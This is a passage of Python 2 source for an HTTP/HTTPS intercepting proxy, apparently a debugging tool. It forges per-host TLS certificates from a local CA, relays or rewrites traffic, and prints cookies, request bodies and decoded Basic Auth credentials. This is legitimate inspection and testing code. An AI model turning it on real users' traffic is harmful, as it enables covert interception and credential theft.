*args, **kwargs): 51 | self.tls = threading.local() 52 | self.tls.conns = {} 53 | 54 | BaseHTTPRequestHandler.__init__(self, *args, **kwargs) 55 | 56 | def log_error(self, format, *args): 57 | # surpress "Request timed out: timeout('timed out',)" 58 | if isinstance(args[0], socket.timeout): 59 | return 60 | 61 | self.log_message(format, *args) 62 | 63 | def do_CONNECT(self): 64 | if os.path.isfile(self.cakey) and os.path.isfile(self.cacert) and os.path.isfile(self.certkey) and os.path.isdir(self.certdir): 65 | self.connect_intercept() 66 | else: 67 | self.connect_relay() 68 | 69 | def connect_intercept(self): 70 | hostname = self.path.split(':')[0] 71 | certpath = "%s/%s.crt" % (self.certdir.rstrip('/'), hostname) 72 | 73 | with self.lock: 74 | if not os.path.isfile(certpath): 75 | epoch = "%d" % (time.time() * 1000) 76 | p1 = Popen(["openssl", "req", "-new", "-key", self.certkey, "-subj", "/CN=%s" % hostname], stdout=PIPE) 77 | p2 = Popen(["openssl", "x509", "-req", "-days", "3650", "-CA", self.cacert, "-CAkey", self.cakey, "-set_serial", epoch, "-out", certpath], stdin=p1.stdout, stderr=PIPE) 78 | p2.communicate() 79 | 80 | self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'Connection Established')) 81 | self.end_headers() 82 | 83 | self.connection = ssl.wrap_socket(self.connection, keyfile=self.certkey, certfile=certpath, server_side=True) 84 | self.rfile = self.connection.makefile("rb", self.rbufsize) 85 | self.wfile = self.connection.makefile("wb", self.wbufsize) 86 | 87 | conntype = self.headers.get('Proxy-Connection', '') 88 | if self.protocol_version == "HTTP/1.1" and conntype.lower() != 'close': 89 | self.close_connection = 0 90 | else: 91 | self.close_connection = 1 92 | 93 | def connect_relay(self): 94 | address = self.path.split(':', 1) 95 | address[1] = int(address[1]) or 443 96 | try: 97 | s = socket.create_connection(address, timeout=self.timeout) 98 | except Exception as e: 99 | self.send_error(502) 100 | return 101 | self.send_response(200, 'Connection Established') 102 | self.end_headers() 103 | 104 | conns = [self.connection, s] 105 | self.close_connection = 0 106 | while not self.close_connection: 107 | rlist, wlist, xlist = select.select(conns, [], conns, self.timeout) 108 | if xlist or not rlist: 109 | break 110 | for r in rlist: 111 | other = conns[1] if r is conns[0] else conns[0] 112 | data = r.recv(8192) 113 | if not data: 114 | self.close_connection = 1 115 | break 116 | other.sendall(data) 117 | 118 | def do_GET(self): 119 | if self.path == 'http://proxy2.test/': 120 | self.send_cacert() 121 | return 122 | 123 | req = self 124 | content_length = int(req.headers.get('Content-Length', 0)) 125 | req_body = self.rfile.read(content_length) if content_length else None 126 | 127 | if req.path[0] == '/': 128 | if isinstance(self.connection, ssl.SSLSocket): 129 | req.path = "https://%s%s" % (req.headers['Host'], req.path) 130 | else: 131 | req.path = "http://%s%s" % (req.headers['Host'], req.path) 132 | 133 | req_body_modified = self.request_handler(req, req_body) 134 | if req_body_modified is False: 135 | self.send_error(403) 136 | return 137 | elif req_body_modified is not None: 138 | req_body = req_body_modified 139 | req.headers['Content-length'] = str(len(req_body)) 140 | 141 | u = urlparse.urlsplit(req.path) 142 | scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path) 143 | assert scheme in ('http', 'https') 144 | if netloc: 145 | req.headers['Host'] = netloc 146 | setattr(req, 'headers', self.filter_headers(req.headers)) 147 | 148 | try: 149 | origin = (scheme, netloc) 150 | if not origin in self.tls.conns: 151 | if scheme == 'https': 152 | self.tls.conns[origin] = httplib.HTTPSConnection(netloc, timeout=self.timeout) 153 | else: 154 | self.tls.conns[origin] = httplib.HTTPConnection(netloc, timeout=self.timeout) 155 | conn = self.tls.conns[origin] 156 | conn.request(self.command, path, req_body, dict(req.headers)) 157 | res = conn.getresponse() 158 | 159 | version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'} 160 | setattr(res, 'headers', res.msg) 161 | setattr(res, 'response_version', version_table[res.version]) 162 | 163 | # support streaming 164 | if not 'Content-Length' in res.headers and 'no-store' in res.headers.get('Cache-Control', ''): 165 | self.response_handler(req, req_body, res, '') 166 | setattr(res, 'headers', self.filter_headers(res.headers)) 167 | self.relay_streaming(res) 168 | with self.lock: 169 | self.save_handler(req, req_body, res, '') 170 | return 171 | 172 | res_body = res.read() 173 | except Exception as e: 174 | if origin in self.tls.conns: 175 | del self.tls.conns[origin] 176 | self.send_error(502) 177 | return 178 | 179 | content_encoding = res.headers.get('Content-Encoding', 'identity') 180 | res_body_plain = self.decode_content_body(res_body, content_encoding) 181 | 182 | res_body_modified = self.response_handler(req, req_body, res, res_body_plain) 183 | if res_body_modified is False: 184 | self.send_error(403) 185 | return 186 | elif res_body_modified is not None: 187 | res_body_plain = res_body_modified 188 | res_body = self.encode_content_body(res_body_plain, content_encoding) 189 | res.headers['Content-Length'] = str(len(res_body)) 190 | 191 | setattr(res, 'headers', self.filter_headers(res.headers)) 192 | 193 | self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason)) 194 | for line in res.headers.headers: 195 | self.wfile.write(line) 196 | self.end_headers() 197 | self.wfile.write(res_body) 198 | self.wfile.flush() 199 | 200 | with self.lock: 201 | self.save_handler(req, req_body, res, res_body_plain) 202 | 203 | def relay_streaming(self, res): 204 | self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason)) 205 | for line in res.headers.headers: 206 | self.wfile.write(line) 207 | self.end_headers() 208 | try: 209 | while True: 210 | chunk = res.read(8192) 211 | if not chunk: 212 | break 213 | self.wfile.write(chunk) 214 | self.wfile.flush() 215 | except socket.error: 216 | # connection closed by client 217 | pass 218 | 219 | do_HEAD = do_GET 220 | do_POST = do_GET 221 | do_PUT = do_GET 222 | do_DELETE = do_GET 223 | do_OPTIONS = do_GET 224 | 225 | def filter_headers(self, headers): 226 | # http://tools.ietf.org/html/rfc2616#section-13.5.1 227 | hop_by_hop = ('connection', 'keep-alive', 'proxy-authenticate', 'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade') 228 | for k in hop_by_hop: 229 | del headers[k] 230 | 231 | # accept only supported encodings 232 | if 'Accept-Encoding' in headers: 233 | ae = headers['Accept-Encoding'] 234 | filtered_encodings = [x for x in re.split(r',\s*', ae) if x in ('identity', 'gzip', 'x-gzip', 'deflate')] 235 | headers['Accept-Encoding'] = ', '.join(filtered_encodings) 236 | 237 | return headers 238 | 239 | def encode_content_body(self, text, encoding): 240 | if encoding == 'identity': 241 | data = text 242 | elif encoding in ('gzip', 'x-gzip'): 243 | io = StringIO() 244 | with gzip.GzipFile(fileobj=io, mode='wb') as f: 245 | f.write(text) 246 | data = io.getvalue() 247 | elif encoding == 'deflate': 248 | data = zlib.compress(text) 249 | else: 250 | raise Exception("Unknown Content-Encoding: %s" % encoding) 251 | return data 252 | 253 | def decode_content_body(self, data, encoding): 254 | if encoding == 'identity': 255 | text = data 256 | elif encoding in ('gzip', 'x-gzip'): 257 | io = StringIO(data) 258 | with gzip.GzipFile(fileobj=io) as f: 259 | text = f.read() 260 | elif encoding == 'deflate': 261 | try: 262 | text = zlib.decompress(data) 263 | except zlib.error: 264 | text = zlib.decompress(data, -zlib.MAX_WBITS) 265 | else: 266 | raise Exception("Unknown Content-Encoding: %s" % encoding) 267 | return text 268 | 269 | def send_cacert(self): 270 | with open(self.cacert, 'rb') as f: 271 | data = f.read() 272 | 273 | self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'OK')) 274 | self.send_header('Content-Type', 'application/x-x509-ca-cert') 275 | self.send_header('Content-Length', len(data)) 276 | self.send_header('Connection', 'close') 277 | self.end_headers() 278 | self.wfile.write(data) 279 | 280 | def print_info(self, req, req_body, res, res_body): 281 | def parse_qsl(s): 282 | return '\n'.join("%-20s %s" % (k, v) for k, v in urlparse.parse_qsl(s, keep_blank_values=True)) 283 | 284 | req_header_text = "%s %s %s\n%s" % (req.command, req.path, req.request_version, req.headers) 285 | res_header_text = "%s %d %s\n%s" % (res.response_version, res.status, res.reason, res.headers) 286 | 287 | print with_color(33, req_header_text) 288 | 289 | u = urlparse.urlsplit(req.path) 290 | if u.query: 291 | query_text = parse_qsl(u.query) 292 | print with_color(32, "==== QUERY PARAMETERS ====\n%s\n" % query_text) 293 | 294 | cookie = req.headers.get('Cookie', '') 295 | if cookie: 296 | cookie = parse_qsl(re.sub(r';\s*', '&', cookie)) 297 | print with_color(32, "==== COOKIE ====\n%s\n" % cookie) 298 | 299 | auth = req.headers.get('Authorization', '') 300 | if auth.lower().startswith('basic'): 301 | token = auth.split()[1].decode('base64') 302 | print with_color(31, "==== BASIC AUTH ====\n%s\n" % token) 303 | 304 | if req_body is not None: 305 | req_body_text = None 306 | content_type = req.headers.get('Content-Type', '') 307 | 308 | if content_type.startswith('application/x-www-form-urlencoded'): 309 | req_body_text = parse_qsl(req_body) 310 | elif content_type.startswith('application/json'): 311 | try: 312 | json_obj = json.loads(req_body) 313 | json_str = json.dumps(json_obj, indent=2) 314 | if json_str.count('\n') < 50: 315 | req_body_text = json_str 316 | else: 317 | lines = json_str.splitlines() 318 | req_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines)) 319 | except ValueError: 320 | req_body_text = req_body 321 | elif len(req_body) < 1024: 322 | req_body_text = req_body 323 | 324 | if req_body_text: 325 | print with_color(32, "==== REQUEST BODY ====\n%s\n" % req_body_text) 326 | 327 | print with_color(36, res_header_text) 328 | 329 | cookies = res.headers.getheaders('Set-Cookie') 330 | if cookies: 331 | cookies = '\n'.join(cookies) 332 | print with_color(31, "==== SET-COOKIE ====\n%s\n" % cookies) 333 | 334 | if res_body is not None: 335 | res_body_text = None 336 | content_type = res.headers.get('Content-Type', '') 337 | 338 | if content_type.startswith('application/json'): 339 | try: 340 | json_obj = json.loads(res_body) 341 | json_str = json.dumps(json_obj, indent=2) 342 | if json_str.count('\n') < 50: 343 | res_body_text = json_str 344 | else: 345 | lines = json_str.splitlines() 346 | res_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines)) 347 | except ValueError: 348 | res_body_text = res_body 349 | elif content_type.startswith('text/html'): 350 | m = re.search(r'